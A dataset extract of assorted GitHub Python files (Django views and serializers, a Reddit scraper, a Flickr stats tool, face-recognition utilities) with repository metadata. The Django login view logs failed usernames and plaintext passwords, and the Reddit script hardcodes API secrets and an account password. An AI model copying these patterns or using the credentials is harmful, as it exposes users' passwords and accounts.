blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2 values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220 values | src_encoding stringclasses 30 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 2 10.3M | extension stringclasses 257 values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0e3a6ea93b8832b3a2244ca253fd45da5eb46ddd | 02d30d5aff19c43dd42ef4fc0f60184bacd80804 | /djangox/dappx/views.py | 9813e9a608072b6f6fbd86386d0c13a30435fdcf | [] | no_license | taxwizard/magic | 61e88345b1ff8b49174b728cc8e178751d13d148 | b6d9b26f55a13619c7de69fadba215fa059a8cde | refs/heads/master | 2020-04-09T09:32:02.357215 | 2018-12-03T18:45:31 | 2018-12-03T18:45:31 | 160,237,065 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,431 | py | from django.shortcuts import render
# Create your views here.
from django.shortcuts import render
from dappx.forms import UserForm,UserProfileInfoForm
from django.contrib.auth import authenticate, login, logout
from django.http import HttpResponseRedirect, HttpResponse
from django.urls import reverse
from django.contrib.auth.decorators import login_required
def index(request):
return render(request,'dappx/index.html')
@login_required
def special(request):
return HttpResponse("You are logged in !")
@login_required
def user_logout(request):
logout(request)
return HttpResponseRedirect(reverse('index'))
def register(request):
registered = False
if request.method == 'POST':
user_form = UserForm(data=request.POST)
profile_form = UserProfileInfoForm(data=request.POST)
if user_form.is_valid() and profile_form.is_valid():
user = user_form.save()
user.set_password(user.password)
user.save()
profile = profile_form.save(commit=False)
profile.user = user
if 'profile_pic' in request.FILES:
print('found it')
profile.profile_pic = request.FILES['profile_pic']
profile.save()
registered = True
else:
print(user_form.errors,profile_form.errors)
else:
user_form = UserForm()
profile_form = UserProfileInfoForm()
return render(request,'dappx/registration.html',
{'user_form':user_form,
'profile_form':profile_form,
'registered':registered})
def user_login(request):
if request.method == 'POST':
username = request.POST.get('username')
password = request.POST.get('password')
user = authenticate(username=username, password=password)
if user:
if user.is_active:
login(request,user)
return HttpResponseRedirect(reverse('index'))
else:
return HttpResponse("Your account was inactive.")
else:
print("Someone tried to login and failed.")
print("They used username: {} and password: {}".format(username,password))
return HttpResponse("Invalid login details given")
else:
return render(request, 'dappx/login.html', {}) | [
"noreply@github.com"
] | taxwizard.noreply@github.com |
1f07585f8b5bd8b97955c465f76f0b70ac4458b1 | 19be6560901ac2d1c2c1cfa307adb84295e58a9e | /backoffice/urls.py | 2e272952075115a11bb1b203fa20a5f776dcfd7c | [] | no_license | Neutrinet/backoffice | ebacf44cf9f7c7581a593a6986f1e83c2cfe2591 | cb87571a87a4f6fec54d47095e454080cf6fbe5c | refs/heads/master | 2023-04-20T09:18:31.755593 | 2023-03-30T20:54:49 | 2023-03-30T20:54:49 | 36,190,840 | 1 | 0 | null | 2017-12-11T18:13:23 | 2015-05-24T20:10:06 | Python | UTF-8 | Python | false | false | 349 | py | from members.views import ffdn_api
from django.conf.urls import include, url
from django.contrib import admin
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^admin2/', include('admin2.urls')),
url(r'^', include('ordering.urls')),
url(r'^accounts/', include('accounts.urls')),
url(r'^isp.json$', ffdn_api),
]
| [
"cortex@worlddomination.be"
] | cortex@worlddomination.be |
2ffedc23f5598055bb31dcde684639506383dbea | 6e543b48f8c18b21b890c65b1adcc0d39ccb0844 | /missionpawssible/projects/serializers.py | 862c894990a91062be535d666b951bdb31867eb5 | [] | no_license | JuLacerdaRod/go-fund-she | af97330d768d776f9258edf3059f3892bb16f1a8 | 83f2d6be406fad46c65007388c315e47989191f4 | refs/heads/main | 2023-08-24T09:48:50.779765 | 2021-09-21T09:18:23 | 2021-09-21T09:18:23 | 405,237,179 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,395 | py | from rest_framework import serializers
from .models import Project, Pledge
class PledgeSerializer(serializers.Serializer):
id = serializers.ReadOnlyField()
amount = serializers.IntegerField()
comment = serializers.CharField(max_length=200)
anonymous = serializers.BooleanField()
supporter_id = serializers.ReadOnlyField(source='supporter.id')
project_id = serializers.IntegerField()
def create(self, validated_data):
return Pledge.objects.create(**validated_data)
class PledgeDetailSerializer(PledgeSerializer):
# pledges = PledgeSerializer(many=True, read_only=True)
def update(self, instance, validated_data):
instance.amount = validated_data.get('amount',instance.amount)
instance.comment = validated_data.get('comment',instance.comment)
instance.anonymous = validated_data.get('anonymous',instance.anonymous)
instance.supporter = validated_data.get('supporter',instance.supporter)
instance.project_id = validated_data.get('project_id',instance.project_id)
instance.save()
return instance
class ProjectSerializer(serializers.Serializer):
id = serializers.ReadOnlyField()
title = serializers.CharField(max_length=200)
description = serializers.CharField(max_length=None)
goal = serializers.IntegerField()
image = serializers.URLField()
is_open = serializers.BooleanField()
date_created = serializers.DateTimeField()
owner = serializers.ReadOnlyField(source='owner.id')
# pledges = PledgeSerializer(many=True, read_only=True)
def create(self, validated_data):
return Project.objects.create(**validated_data)
class ProjectDetailSerializer(ProjectSerializer):
pledges = PledgeSerializer(many=True, read_only=True)
def update(self, instance, validated_data):
instance.title = validated_data.get('title',instance.title)
instance.description = validated_data.get('description',instance.description)
instance.goal = validated_data.get('goal',instance.goal)
instance.image = validated_data.get('image',instance.image)
instance.is_open = validated_data.get('is_open',instance.is_open)
instance.date_created = validated_data.get('date_created',
instance.date_created)
instance.owner = validated_data.get('owner',instance.owner)
instance.save()
return instance | [
"julacerdarod@gmail.com"
] | julacerdarod@gmail.com |
cfab73f899955cd6e504bcd7366d6dbf57f3daa9 | f8d29bab926173769b77045bf2c9d7037bd41427 | /liwc_pre.py | a3d122b71633a4cdb972a4ef16e8082a8dbf0392 | [] | no_license | rz-zhang/Reddit-Roles-Identification | c7ca5c05b2b5154240f3bf92addf00e36142c857 | 203bdbc5cbcaf7cfd4b4980ef0568899a58cd962 | refs/heads/master | 2022-04-28T04:21:49.384212 | 2020-04-28T03:51:38 | 2020-04-28T03:51:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,861 | py | # Find the authors who are in the author_rep list,
# and look for their comments in the corresponding month,
# extend the representation with the liwc analysis results
import praw
from praw import models
import pandas
from util import in_duration
import pprint
reddit = praw.Reddit(client_id='O3eCkJp5u4-S-Q',
client_secret='zBLTi3qGzBn0qdkvvA4Fdf0NZGE',
password='777zrz777',
user_agent='RonzeyZhang v1.0 by /u/RonzeyZhang',
username='RonzeyZhang')
month = '2019_01'
root_path = 'D:/Research/roleIdentification/dataset'
authors_path = '{}/author_{}_rep'.format(root_path,month)
comments_path = '{}/comment_{}.csv'.format(root_path,month)
authors_file = open(authors_path, encoding='utf8')
comments_file = open(comments_path, encoding='utf8')
count = 0
comments_csv = pandas.read_csv(comments_path)
for line in authors_file.readlines()[1:]:
author_name = line.split(',')[0] # prevent the same sub strings are found in comment_body field
title = author_name
text_output = ''
redditor = praw.models.Redditor(reddit, name = author_name)
author_comments = []
redditor_comments = comments_csv['body'][comments_csv['author'] == author_name]
# count the number of each user's comments in a specific time period
title += ' ' + str(redditor_comments.values.size) # number of comments
for comment in redditor_comments.values:
comment = ' '.join(comment.split())
text_output += (comment + '\n')
count += 1
print(count)
author_comments_path = '{}/authors_comments_{}/{}.txt'.format(root_path, month, title)
author_comments_file = open(author_comments_path, 'w', encoding='utf8')
author_comments_file.write(text_output)
author_comments_file.close()
| [
"noreply@github.com"
] | rz-zhang.noreply@github.com |
908bab1dfe33c354c3f5947bb5bd3268cfa0f337 | ea508c55e951f23ec2f4f5ff35b193d9f30a989a | /pyext/test.py | d7b0ce4ba8ffc10b98cd26926e8478b87f8826c4 | [
"Apache-2.0"
] | permissive | intel-ai/pysamprof | f746551e30237fae9b8869e5e05156a3cb2aba13 | 643de4dd8260c9cd2f75ad5accf9b2e4cbd96c4d | refs/heads/master | 2023-01-25T02:21:01.665315 | 2020-11-27T08:18:22 | 2020-11-27T08:18:22 | 159,366,126 | 2 | 1 | Apache-2.0 | 2020-12-03T15:32:18 | 2018-11-27T16:30:40 | C | UTF-8 | Python | false | false | 752 | py | #!/usr/bin/env python
import pysamprof
import threading
import os
import errno
import sys
import subprocess
def start_collection():
counter = 0
while True:
target_path = '%s/results/%s' % (os.getcwd(), counter)
if os.path.exists(target_path):
counter += 1
else:
break
pysamprof.start(target_path)
def task():
import time
import socket
stop = time.time() + 1
while time.time() <= stop:
pass
if __name__ == '__main__':
# proc = subprocess.Popen([sys.executable,
# os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), 'subtest.py')])
start_collection()
th = threading.Thread(target=task)
th.start()
th.join()
# proc.wait()
| [
"vasilij.n.litvinov@intel.com"
] | vasilij.n.litvinov@intel.com |
afa32d1c3d5daebf1a948e6638727b886e31b161 | 5c9511bc538045389e28183b0bc65d9b6cf51b85 | /05/Funkce.py | 5816b5e366a4ab2d42b8b4d3d4a990295a30d386 | [] | no_license | balonovatereza/Pyladies-repository | 0174360835dd1094532118eda1e2821da8108f77 | d4ad0dae829d21a56e6fb86d7a7dcfdc9387ae27 | refs/heads/master | 2020-05-01T09:25:25.300245 | 2019-05-18T09:10:50 | 2019-05-18T09:10:50 | 177,399,871 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 814 | py | from math import pi
def obsah_elipsy(a, b):
"Vrati obsah elipsy danych rozmeru."
return pi * a * b
print('Obsah elipsy s osami 4 a 6 cm je', obsah_elipsy(4, 6), 'cm2.')
obsah = 0
a = 30
def obsah_elipsy(a, b):
obsah = pi * a * b # Přiřazení do `obsah`
a = a + 3 # Přiřazení do `a`
return obsah
print(obsah_elipsy(a, 20))
print(obsah)
print(a)
print('--\N{LATIN SMALL LETTER L WITH STROKE}--')
print('--\N{SECTION SIGN}--')
print('--\N{PER MILLE SIGN}--')
print('--\N{BLACK STAR}--')
print('--\N{SNOWMAN}--')
print('--\N{KATAKANA LETTER TU}--')
retezec = 'Ahoj'
print(retezec.upper())
print(retezec.lower())
print(retezec)
jmeno = input('Zadej jmeno: ')
prijmeni = input('Zadej prijmeni: ')
inicialy = jmeno[0] + prijmeni[0]
print('Tvoje inicialy jsou: ', inicialy.upper())
| [
"balonova.tereza@seznam.cz"
] | balonova.tereza@seznam.cz |
d5c8d40acc3d63d3f90c826b6f55231a1363ca22 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_september.py | 50ec52f86c7a3f910be158d3734960cae05fab5d | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 348 | py |
#calss header
class _SEPTEMBER():
def __init__(self,):
self.name = "SEPTEMBER"
self.definitions = [u'the ninth month of the year, after August and before October: ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
9e512c5d9e8119a11810e649608867f8a3af320f | fe2732ca61b61b1c26b932af40dc5fb79117e8da | /build/prepare_patch_release.py | 19cb94a4938378cd226d454f8f3d6b14fc03e8e5 | [
"Apache-2.0"
] | permissive | approvals/ApprovalTests.cpp.Qt | ac0c00611752d5704330300e725baf3b8494a7c5 | 7183690eaa50334dfc70d0ec02599a89e154ceb2 | refs/heads/master | 2022-08-21T15:59:12.750971 | 2022-08-15T16:42:23 | 2022-08-15T16:42:23 | 215,129,552 | 12 | 1 | Apache-2.0 | 2020-01-24T20:36:51 | 2019-10-14T19:34:07 | C++ | UTF-8 | Python | false | false | 311 | py | #! /usr/bin/env python3
import scripts_qt.include_approvals_path # Note This is used!
from scripts.prepare_release import build
from scripts_qt.qt_project_details import qt_project_details
if __name__ == '__main__':
build(lambda v: v.update_patch(), deploy = False, project_details=qt_project_details())
| [
"github@cfmacrae.fastmail.co.uk"
] | github@cfmacrae.fastmail.co.uk |
8491422835ce360f0b87c4cbba1d2b1e856f3031 | 25714f66fb3409b37cd147c0df6aa7b45bc361e2 | /src/flickrStatRetriever.py | ad376bfc1cb8b36053ec044a7e6124c21f7fe8c1 | [] | no_license | shelbrudy/flickr-photo-stat-retriever | 5fdf8bd14bd21e26a17fc0380f0823f6c255c87e | 062ba1621d4eb3b47ae2abdd507bf3970926dfeb | refs/heads/master | 2020-03-18T01:00:58.077605 | 2018-05-20T05:50:27 | 2018-05-20T05:50:27 | 134,123,419 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,191 | py | import flickrapi
from flickrapi import FlickrAPI
import datetime as datetime
import csv
import argparse
import googlemaps
import time
import sys
import config
import requests
#globals
gmaps_key = 'redacted'
public_key = 'redacted'
secret_key = 'redacted'
flickr = FlickrAPI(public_key, secret_key, format='parsed-json')
gmaps = googlemaps.Client(key=gmaps_key)
#methods
def convertTimestamp(unix_timestamp):
if unix_timestamp != 'null' or date_posted != 'empty':
return datetime.datetime.fromtimestamp(int(unix_timestamp)).strftime('%Y-%m-%d %H:%M:%S')
return unix_timestamp
def createCSV(records_list, file_name, mode):
if mode == 'append':
write_mode = 'a'
if mode == 'overwrite':
write_mode = "w"
with open(file_name, write_mode) as f:
writer = csv.writer(f)
writer.writerows(records_list)
def createRedoList(redo_list):
with open("./results/redo.txt", "w") as f:
f.write(''.join(redo_list))
def parseImageList(file_name):
f = open(file_name)
img_list = []
img_list = [line for line in f]
f.close()
return img_list
def retrieveUserCoordinates(location):
lat_long = []
if location != '':
location_dict = gmaps.geocode(location)[0]
lat_long.append(location_dict['geometry'].get('location', {}).get('lat', ''))
lat_long.append(location_dict['geometry'].get('location', {}).get('lng', ''))
return lat_long
else:
return(['', ''])
def parsePhotoInfo(photo_dict, favorites_dict):
photo_info = []
photo_info.append(photo_dict['photo'].get('dates', {}).get('taken', ''))
photo_info.append(convertTimestamp(photo_dict['photo'].get('dates', {}).get('posted', '')))
photo_info.append(photo_dict['photo'].get('location', {}).get('latitude', ''))
photo_info.append(photo_dict['photo'].get('location', {}).get('longitude', ''))
photo_info.append(photo_dict['photo'].get('comments', {}).get('_content', ''))
photo_info.append(photo_dict['photo'].get('views', ''))
photo_info.append(favorites_dict['photo'].get('total', ''))
return photo_info
def parseUserInfo(user_dict):
user_info = []
user_info.append(user_dict['person'].get('id', ''))
user_info.append(user_dict['person'].get('ispro', ''))
user_location = user_dict['person'].get('location', {}).get('_content', '')
user_info.extend(retrieveUserCoordinates(user_location))
user_info.append(user_dict['person']['photos'].get('firstdatetaken', {}).get('_content', ''))
user_info.append(convertTimestamp(user_dict['person']['photos'].get('firstdate', {}).get('_content', '')))
user_info.append(str(user_dict['person']['photos'].get('count', {}).get('_content', '')))
return user_info
def createRecord(photo_id, flickr_photo_id, user_info, photo_info):
record = []
record.append(photo_id.strip())
record.append(flickr_photo_id)
record.extend(photo_info)
record.extend(user_info)
return record
def main(input_file, output_file, mode):
img_list = parseImageList(input_file)
record_list = []
reject_list = []
redo_list = []
if mode != 'append':
record_list.append(config.record_schema)
reject_list.append(config.reject_schema)
counter = 1;
for photo_id in img_list:
print("Processing image {} out of {}".format(counter, len(img_list)))
counter = counter+1
record = []
reject = []
photo_info = []
user_info = []
flickr_photo_id = photo_id.partition('_')[0]
try:
photo_dict = flickr.photos.getInfo(api_key = public_key, photo_id=flickr_photo_id)
favorites_dict = flickr.photos.getFavorites(api_key = public_key, photo_id=flickr_photo_id)
photo_info = parsePhotoInfo(photo_dict, favorites_dict)
user_dict = flickr.people.getinfo(api_key = public_key, user_id = photo_dict['photo']['owner']['nsid'])
user_info = parseUserInfo(user_dict)
except flickrapi.exceptions.FlickrError as e:
if e.code == None:
redo_list.append(photo_id)
continue
else:
if not photo_info:
photo_info = ['']*7
if not user_info:
user_info = ['']*7
reject.append(photo_id.rstrip())
reject.append(photo_id.partition('_')[0])
reject.append(e.code)
reject_list.append(reject)
except requests.exceptions.ConnectionError as e:
redo_list.append(photo_id)
continue
except googlemaps.exceptions.Timeout as e:
redo_list.append(photo_id)
continue
except:
print("Unexpected error:", sys.exc_info()[0])
if not photo_info:
photo_info = ['']*7
if not user_info:
user_info = ['']*7
reject.append(photo_id.rstrip())
reject.append(photo_id.partition('_')[0])
reject.append('x')
reject_list.append(reject)
record_list.append(createRecord(photo_id, flickr_photo_id, user_info, photo_info))
createRedoList(redo_list)
createCSV(record_list, output_file, mode)
createCSV(reject_list, './results/reject.csv', mode)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Application to retrieve social media statistics from the Flickr API')
parser.add_argument('f',
help='Input file to be processed')
parser.add_argument('o',
help='File output is to be written to')
parser.add_argument('m',
help='Mode for output file (append or overwrite)')
args = parser.parse_args()
if(args.f):
print("Input file is %s" % args.f)
else:
print("NO INPUT FILE")
exit()
if(args.o):
print("Output file is %s" % args.o)
else:
print("NO OUTPUT FILE")
exit()
if(args.m):
print("Output file mode is %s" % args.o)
else:
print("NO OUTPUT MODE")
exit()
main(args.f, args.o, args.m)
| [
"shelbyruettiger@Shelbys-MBP.lan"
] | shelbyruettiger@Shelbys-MBP.lan |
b7e0bc35e5413fbdafa72bec025d37f9520c7afe | efa65c2fa333000a287adee1a427447a00cee502 | /src/cluster/migrations/0004_auto_20180731_1747.py | 9910fa7d37147bb4eb3f540ff8abfcfd51a363fd | [
"MIT"
] | permissive | mrc-rius/computational_marketing_master_thesis | 628786a895a7529acba1b8b43c3d4e392f734404 | 9d64062dde814813e8b4bf03312d8da268585571 | refs/heads/master | 2020-03-28T01:05:28.166689 | 2018-09-05T08:51:38 | 2018-09-05T08:51:38 | 147,476,272 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 597 | py | # Generated by Django 2.0.5 on 2018-07-31 15:47
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cluster', '0003_battery_centroids_financing_insurance_maintenance_manager_smarthome_vehicle'),
]
operations = [
migrations.AlterField(
model_name='centroids',
name='consumption',
field=models.IntegerField(),
),
migrations.AlterField(
model_name='centroids',
name='power',
field=models.CharField(max_length=200),
),
]
| [
"mrius@factorenergia.com"
] | mrius@factorenergia.com |
ad273f34cf7160c106be57d1e382dd01820c91d6 | 9d2e6046782909323784b92efd0b96705fce1df5 | /django-rest-framework-code-master/albums/urls.py | 68db55be6f85a7bd3bc8fc48ffea956a49c841eb | [] | no_license | Mahe7461/Angular | b08704381ccc730138f942ae1028ab279017a728 | d1e776caa208a75bdd8053966d18f1c2e8f9fe9b | refs/heads/main | 2023-06-17T03:08:14.179893 | 2021-07-09T12:26:00 | 2021-07-09T12:26:00 | 341,572,819 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 331 | py | from django.conf.urls import url, include
from .views import AlbumViewset, TrackViewset
from rest_framework.routers import DefaultRouter
router = DefaultRouter()
router.register("album", AlbumViewset, basename="album")
router.register("track", TrackViewset, basename="track")
urlpatterns = [
url('', include(router.urls))
]
| [
"mahe7461@gmail.com"
] | mahe7461@gmail.com |
0109a179ee735207ec1b52d992d39e9a466ab901 | d73bb40119baac61263f89cc128c11a2779fc2ad | /0x00-python_variable_annotations/1-concat.py | 0bdb808b6506ac92345101244e777e0bf1fb85d6 | [] | no_license | dlscoccia/holbertonschool-web_back_end | 376bab65447a7ce25116494e34bb14ef074478c4 | cf3291e3f69e14f11cfdfc1ccc1d3d95fbdc0589 | refs/heads/main | 2023-08-25T22:35:35.030155 | 2021-10-20T04:12:58 | 2021-10-20T04:12:58 | 387,456,993 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 136 | py | #!/usr/bin/env python3
'''python module'''
def concat(str1: str, str2: str) -> str:
'''concat strings'''
return (str1 + str2)
| [
"2054@holbertonschool.com"
] | 2054@holbertonschool.com |
615abb41b4d786dd18b653f8eb2297d2103ac2db | 4975cb0ef1ea9b1c756846286ee272b45bacdfb4 | /OOP/overall.py | b2a101c9485b9a470d6f3c39a702dfd037828a61 | [] | no_license | thesniya/pythonProgram | 38ead334017719adbb942b91dadab82451866512 | e924c0ca77a720e61a62ba2e1984509be1787ece | refs/heads/master | 2020-11-26T09:06:10.837337 | 2019-12-19T10:10:10 | 2019-12-19T10:10:10 | 229,024,711 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 513 | py | class student:
schoolname='luminar technolab' #static variable
def setval(self,id,name):
self.id=id #instance variable
self.name=name
def printval(self):
print(self.id,'==',self.name,'===',student.schoolname)
@classmethod
def setschool(cls,name):
cls.schoolname=name
@staticmethod
def greetings():
print('welcome')
s=student()
s.setval(100,'noname')
s.printval()
s.setschool('luminar technolab sol')
s.printval()
student.greetings()
| [
"thesni77@gmail.com"
] | thesni77@gmail.com |
e5bf7d983f85ce369c1221127a8fc207202bbe62 | 602f399e7dd78fd46a3b1159e081f89533401c9c | /Convolutional Neural Networks/Face Recognition/fr_utils.py | 80ba4fd4006e5718462ef5b16fb89295e46370be | [] | no_license | bhanupratapmall/Deep-learning.ai- | 67a1dc7a1b87d3cd7155fff9613681288b98d3b5 | 416ed3c03f847b4a9349a1832c06245e87fc9242 | refs/heads/master | 2022-12-02T21:26:44.345302 | 2020-08-10T15:53:53 | 2020-08-10T15:53:53 | 283,454,786 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,680 | py | #### PART OF THIS CODE IS USING CODE FROM VICTOR SY WANG: https://github.com/iwantooxxoox/Keras-OpenFace/blob/master/utils.py ####
import tensorflow as tf
import numpy as np
import os
import cv2
from numpy import genfromtxt
from keras.layers import Conv2D, ZeroPadding2D, Activation, Input, concatenate
from keras.models import Model
from keras.layers.normalization import BatchNormalization
from keras.layers.pooling import MaxPooling2D, AveragePooling2D
import h5py
import matplotlib.pyplot as plt
_FLOATX = 'float32'
def variable(value, dtype=_FLOATX, name=None):
v = tf.Variable(np.asarray(value, dtype=dtype), name=name)
_get_session().run(v.initializer)
return v
def shape(x):
return x.get_shape()
def square(x):
return tf.square(x)
def zeros(shape, dtype=_FLOATX, name=None):
return variable(np.zeros(shape), dtype, name)
def concatenate(tensors, axis=-1):
if axis < 0:
axis = axis % len(tensors[0].get_shape())
return tf.concat(axis, tensors)
def LRN2D(x):
return tf.nn.lrn(x, alpha=1e-4, beta=0.75)
def conv2d_bn(x,
layer=None,
cv1_out=None,
cv1_filter=(1, 1),
cv1_strides=(1, 1),
cv2_out=None,
cv2_filter=(3, 3),
cv2_strides=(1, 1),
padding=None):
num = '' if cv2_out == None else '1'
tensor = Conv2D(cv1_out, cv1_filter, strides=cv1_strides, data_format='channels_first', name=layer+'_conv'+num)(x)
tensor = BatchNormalization(axis=1, epsilon=0.00001, name=layer+'_bn'+num)(tensor)
tensor = Activation('relu')(tensor)
if padding == None:
return tensor
tensor = ZeroPadding2D(padding=padding, data_format='channels_first')(tensor)
if cv2_out == None:
return tensor
tensor = Conv2D(cv2_out, cv2_filter, strides=cv2_strides, data_format='channels_first', name=layer+'_conv'+'2')(tensor)
tensor = BatchNormalization(axis=1, epsilon=0.00001, name=layer+'_bn'+'2')(tensor)
tensor = Activation('relu')(tensor)
return tensor
WEIGHTS = [
'conv1', 'bn1', 'conv2', 'bn2', 'conv3', 'bn3',
'inception_3a_1x1_conv', 'inception_3a_1x1_bn',
'inception_3a_pool_conv', 'inception_3a_pool_bn',
'inception_3a_5x5_conv1', 'inception_3a_5x5_conv2', 'inception_3a_5x5_bn1', 'inception_3a_5x5_bn2',
'inception_3a_3x3_conv1', 'inception_3a_3x3_conv2', 'inception_3a_3x3_bn1', 'inception_3a_3x3_bn2',
'inception_3b_3x3_conv1', 'inception_3b_3x3_conv2', 'inception_3b_3x3_bn1', 'inception_3b_3x3_bn2',
'inception_3b_5x5_conv1', 'inception_3b_5x5_conv2', 'inception_3b_5x5_bn1', 'inception_3b_5x5_bn2',
'inception_3b_pool_conv', 'inception_3b_pool_bn',
'inception_3b_1x1_conv', 'inception_3b_1x1_bn',
'inception_3c_3x3_conv1', 'inception_3c_3x3_conv2', 'inception_3c_3x3_bn1', 'inception_3c_3x3_bn2',
'inception_3c_5x5_conv1', 'inception_3c_5x5_conv2', 'inception_3c_5x5_bn1', 'inception_3c_5x5_bn2',
'inception_4a_3x3_conv1', 'inception_4a_3x3_conv2', 'inception_4a_3x3_bn1', 'inception_4a_3x3_bn2',
'inception_4a_5x5_conv1', 'inception_4a_5x5_conv2', 'inception_4a_5x5_bn1', 'inception_4a_5x5_bn2',
'inception_4a_pool_conv', 'inception_4a_pool_bn',
'inception_4a_1x1_conv', 'inception_4a_1x1_bn',
'inception_4e_3x3_conv1', 'inception_4e_3x3_conv2', 'inception_4e_3x3_bn1', 'inception_4e_3x3_bn2',
'inception_4e_5x5_conv1', 'inception_4e_5x5_conv2', 'inception_4e_5x5_bn1', 'inception_4e_5x5_bn2',
'inception_5a_3x3_conv1', 'inception_5a_3x3_conv2', 'inception_5a_3x3_bn1', 'inception_5a_3x3_bn2',
'inception_5a_pool_conv', 'inception_5a_pool_bn',
'inception_5a_1x1_conv', 'inception_5a_1x1_bn',
'inception_5b_3x3_conv1', 'inception_5b_3x3_conv2', 'inception_5b_3x3_bn1', 'inception_5b_3x3_bn2',
'inception_5b_pool_conv', 'inception_5b_pool_bn',
'inception_5b_1x1_conv', 'inception_5b_1x1_bn',
'dense_layer'
]
conv_shape = {
'conv1': [64, 3, 7, 7],
'conv2': [64, 64, 1, 1],
'conv3': [192, 64, 3, 3],
'inception_3a_1x1_conv': [64, 192, 1, 1],
'inception_3a_pool_conv': [32, 192, 1, 1],
'inception_3a_5x5_conv1': [16, 192, 1, 1],
'inception_3a_5x5_conv2': [32, 16, 5, 5],
'inception_3a_3x3_conv1': [96, 192, 1, 1],
'inception_3a_3x3_conv2': [128, 96, 3, 3],
'inception_3b_3x3_conv1': [96, 256, 1, 1],
'inception_3b_3x3_conv2': [128, 96, 3, 3],
'inception_3b_5x5_conv1': [32, 256, 1, 1],
'inception_3b_5x5_conv2': [64, 32, 5, 5],
'inception_3b_pool_conv': [64, 256, 1, 1],
'inception_3b_1x1_conv': [64, 256, 1, 1],
'inception_3c_3x3_conv1': [128, 320, 1, 1],
'inception_3c_3x3_conv2': [256, 128, 3, 3],
'inception_3c_5x5_conv1': [32, 320, 1, 1],
'inception_3c_5x5_conv2': [64, 32, 5, 5],
'inception_4a_3x3_conv1': [96, 640, 1, 1],
'inception_4a_3x3_conv2': [192, 96, 3, 3],
'inception_4a_5x5_conv1': [32, 640, 1, 1,],
'inception_4a_5x5_conv2': [64, 32, 5, 5],
'inception_4a_pool_conv': [128, 640, 1, 1],
'inception_4a_1x1_conv': [256, 640, 1, 1],
'inception_4e_3x3_conv1': [160, 640, 1, 1],
'inception_4e_3x3_conv2': [256, 160, 3, 3],
'inception_4e_5x5_conv1': [64, 640, 1, 1],
'inception_4e_5x5_conv2': [128, 64, 5, 5],
'inception_5a_3x3_conv1': [96, 1024, 1, 1],
'inception_5a_3x3_conv2': [384, 96, 3, 3],
'inception_5a_pool_conv': [96, 1024, 1, 1],
'inception_5a_1x1_conv': [256, 1024, 1, 1],
'inception_5b_3x3_conv1': [96, 736, 1, 1],
'inception_5b_3x3_conv2': [384, 96, 3, 3],
'inception_5b_pool_conv': [96, 736, 1, 1],
'inception_5b_1x1_conv': [256, 736, 1, 1],
}
def load_weights_from_FaceNet(FRmodel):
# Load weights from csv files (which was exported from Openface torch model)
weights = WEIGHTS
weights_dict = load_weights()
# Set layer weights of the model
for name in weights:
if FRmodel.get_layer(name) != None:
FRmodel.get_layer(name).set_weights(weights_dict[name])
elif model.get_layer(name) != None:
model.get_layer(name).set_weights(weights_dict[name])
def load_weights():
# Set weights path
dirPath = './weights'
fileNames = filter(lambda f: not f.startswith('.'), os.listdir(dirPath))
paths = {}
weights_dict = {}
for n in fileNames:
paths[n.replace('.csv', '')] = dirPath + '/' + n
for name in WEIGHTS:
if 'conv' in name:
conv_w = genfromtxt(paths[name + '_w'], delimiter=',', dtype=None)
conv_w = np.reshape(conv_w, conv_shape[name])
conv_w = np.transpose(conv_w, (2, 3, 1, 0))
conv_b = genfromtxt(paths[name + '_b'], delimiter=',', dtype=None)
weights_dict[name] = [conv_w, conv_b]
elif 'bn' in name:
bn_w = genfromtxt(paths[name + '_w'], delimiter=',', dtype=None)
bn_b = genfromtxt(paths[name + '_b'], delimiter=',', dtype=None)
bn_m = genfromtxt(paths[name + '_m'], delimiter=',', dtype=None)
bn_v = genfromtxt(paths[name + '_v'], delimiter=',', dtype=None)
weights_dict[name] = [bn_w, bn_b, bn_m, bn_v]
elif 'dense' in name:
dense_w = genfromtxt(dirPath+'/dense_w.csv', delimiter=',', dtype=None)
dense_w = np.reshape(dense_w, (128, 736))
dense_w = np.transpose(dense_w, (1, 0))
dense_b = genfromtxt(dirPath+'/dense_b.csv', delimiter=',', dtype=None)
weights_dict[name] = [dense_w, dense_b]
return weights_dict
def load_dataset():
train_dataset = h5py.File('datasets/train_happy.h5', "r")
train_set_x_orig = np.array(train_dataset["train_set_x"][:]) # your train set features
